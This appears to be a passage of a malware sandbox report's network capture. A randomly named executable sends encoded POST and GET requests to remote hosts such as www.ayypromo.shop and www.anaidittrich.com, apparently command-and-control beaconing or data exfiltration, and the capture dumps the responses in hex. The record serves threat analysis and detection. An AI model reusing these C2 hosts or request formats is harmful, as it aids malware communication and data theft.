6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
            Sep 2, 2024 09:09:42.462999105 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
            Sep 2, 2024 09:09:42.463011980 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
            Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
            Sep 2, 2024 09:09:42.463460922 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            29192.168.2.649754176.57.64.102802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:55.702198982 CEST758OUTPOST /rgqx/ HTTP/1.1
            Host: www.ayypromo.shop
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.ayypromo.shop
            Referer: http://www.ayypromo.shop/rgqx/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 45 70 77 66 56 4d 33 57 72 78 51 67 2b 74 42 76 34 78 6e 32 66 6c 4c 49 59 42 66 36 75 79 59 69 4c 48 5a 6e 58 68 43 6b 4c 4e 75
            Data Ascii: cLqL3H=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3EpwfVM3WrxQg+tBv4xn2flLIYBf6uyYiLHZnXhCkLNu
            Sep 2, 2024 09:09:56.327955008 CEST1147INHTTP/1.1 404 Not Found
            Server: ddos-guard
            Connection: close
            Set-Cookie: __ddg1_=X2WQeMp3StIMoABJ1Ctz; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:09:56 GMT
            Date: Mon, 02 Sep 2024 07:09:56 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 738
            Last-Modified: Fri, 30 Aug 2024 07:12:48 GMT
            ETag: "2e2-620e151931c8a"
            Accept-Ranges: bytes
            X-Frame-Options: SAMEORIGIN
            Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
            Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            30192.168.2.649755176.57.64.102802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:58.257577896 CEST782OUTPOST /rgqx/ HTTP/1.1
            Host: www.ayypromo.shop
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.ayypromo.shop
            Referer: http://www.ayypromo.shop/rgqx/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 46 4a 49 61 5a 74 36 4f 79 79 67 4c 2f 5a 31 41 74 6c 72 2f 6f 4e 46 6b 6b 79 57 52 33 71 65 4a 61 78 4d 65 67 43 6e 43 59 72 4d 41 3d 3d
            Data Ascii: cLqL3H=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPFJIaZt6OyygL/Z1Atlr/oNFkkyWR3qeJaxMegCnCYrMA==
            Sep 2, 2024 09:09:59.047502995 CEST749INHTTP/1.1 404 Not Found
            Server: ddos-guard
            Connection: close
            Set-Cookie: __ddg1_=mYx1wAOx31cidrOiiFli; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:09:58 GMT
            Date: Mon, 02 Sep 2024 07:09:58 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 340
            Last-Modified: Tue, 29 May 2018 17:41:27 GMT
            ETag: "154-56d5bbe607fc0"
            Accept-Ranges: bytes
            X-Frame-Options: SAMEORIGIN
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
            Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            31192.168.2.649756176.57.64.102802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:10:00.809286118 CEST1795OUTPOST /rgqx/ HTTP/1.1
            Host: www.ayypromo.shop
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.ayypromo.shop
            Referer: http://www.ayypromo.shop/rgqx/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 61 4e 77 77 76 63 76 59 4c 35 2f 38 35 33 44 68 59 66 46 37 78 42 30 6a 39 30 48 48 68 38 6c 43 6e 4b 48 66 59 2b 4d 4d 65 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 31 4e 74 2b 69 30 34 57 54 70 56 78 54 75 6b 4a 58 53 4d 44 74 2f 31 6d 47 43 69 70 53 52 43 71 69 70 33 38 70 68 56 49 62 4b 39 4f 31 4b 48 57 50 71 32 4e 68 70 76 39 30 64 70 66 71 6c 4c 53 47 52 52 59 51 61 66 55 74 38 67 4f 44 6a 34 7a [TRUNCATED]
            Data Ascii: cLqL3H=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXSip4BEArEQLZOP/KbX5yvU9ieF8UYbgwOOxQr30g1B1arXJLT1mGbNtB33j6lFJsqI/amgVsM2ALchWBuM7J06hGU2FXMXU+C9bxJNSA7vU6kEh62dPb5L2m0DekEJWJVs+MpqnaNwwvcvYL5/853DhYfF7xB0j90HHh8lCnKHfY+MMexMhmxaR63MJ36kUqht80gRvsxAEICgHEm1Nt+i04WTpVxTukJXSMDt/1mGCipSRCqip38phVIbK9O1KHWPq2Nhpv90dpfqlLSGRRYQafUt8gODj4z39UKIrA2KxKHdjYxg8Y8UFCsosRRKWdG5IPjku6NGpTlRMbeDml0aQD1bJBgItLZHg4bq63hc83APoEM106GYQBNUD36gi44z3NSIF2YhmMhOM2WjW2VOH6YjBtxSLykF5vGGmi886OPHdJ3xmxn4QVsdEd4oh3GHXcQE10+yspEpq/VB7wOs7zR95TQ+3KRgOCybycop0Qagy47IuUR3vn9HeOMyo72zGNKv1/qTZTQczQLvvZ93omO7MP5Rbgp7JSXy0R0+zmBch8IHLDSMLMg4e71YflO67TIZPepR4aFbfEC6fJ67E09w7ITB4yY/E/K6YUCSdvV0VJu3PbqtUSdDdxvt88IF2HwHtB7G22ITvxK762Dt5mg526gY5DgY25/aoLLRUIVbTeBpapucqDqaEUzNbQ8+n3yTEhhDT/BMqsHfVehGNepQZ+XC1hb2CjyWsIWXwvWkp2ECOYXHyb36Vga4R+iKOaKyLmSLgyP4QlPh9nLwQdU9W38ooLlr4tIsDavr0NS0gXYeCdjxCHd9zywY4He8iyXIYn+E2YImyJiuS++TlKwTWTXqVsnHHMz813yFwz6ZbMZBeQhmgeeFZ4ifPYobxSZypTgkoN/ViHjZ3OCtsmCNodLrCEtlBx8nooO/o4REVQElCoXywc347M54O1mCZ [TRUNCATED]
            Sep 2, 2024 09:10:01.547341108 CEST749INHTTP/1.1 404 Not Found
            Server: ddos-guard
            Connection: close
            Set-Cookie: __ddg1_=RWKJE3AwJRomtoCjG8b7; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:10:01 GMT
            Date: Mon, 02 Sep 2024 07:10:01 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 340
            Last-Modified: Tue, 29 May 2018 17:41:27 GMT
            ETag: "154-56d5bbe607fc0"
            Accept-Ranges: bytes
            X-Frame-Options: SAMEORIGIN
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
            Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            32192.168.2.649757176.57.64.102802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:10:03.345312119 CEST504OUTGET /rgqx/?cLqL3H=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.ayypromo.shop
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:10:03.969813108 CEST727INHTTP/1.1 404 Not Found
            Server: ddos-guard
            Connection: close
            Set-Cookie: __ddg1_=4F54oIPwlFKf97YFLHjp; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 02-Sep-2025 07:10:03 GMT
            Date: Mon, 02 Sep 2024 07:10:04 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 340
            Last-Modified: Tue, 29 May 2018 17:41:27 GMT
            ETag: "154-56d5bbe607fc0"
            X-Frame-Options: SAMEORIGIN
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
            Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            33192.168.2.649758162.55.254.209802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:10:09.035440922 CEST767OUTPOST /qpwk/ HTTP/1.1
            Host: www.anaidittrich.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.anaidittrich.com
            Referer: http://www.anaidittrich.com/qpwk/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 31 37 48 56 4e 47 62 33 2b 34 57 65 5a 48 32 76 6a 63 69 43 31 4f 74 50 75 58 2f 61 34 48 61 37 4c 71 6c 51 69 76 77 66 44 5a 6f
            Data Ascii: cLqL3H=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8Zdrr17HVNGb3+4WeZH2vjciC1OtPuX/a4Ha7LqlQivwfDZo
            Sep 2, 2024 09:10:09.701852083 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:10:09 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
            Upgrade: h2c
            Connection: Upgrade, close
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
            Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
            Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
            Sep 2, 2024 09:10:09.701873064 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
            Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
            Sep 2, 2024 09:10:09.701885939 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
            Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
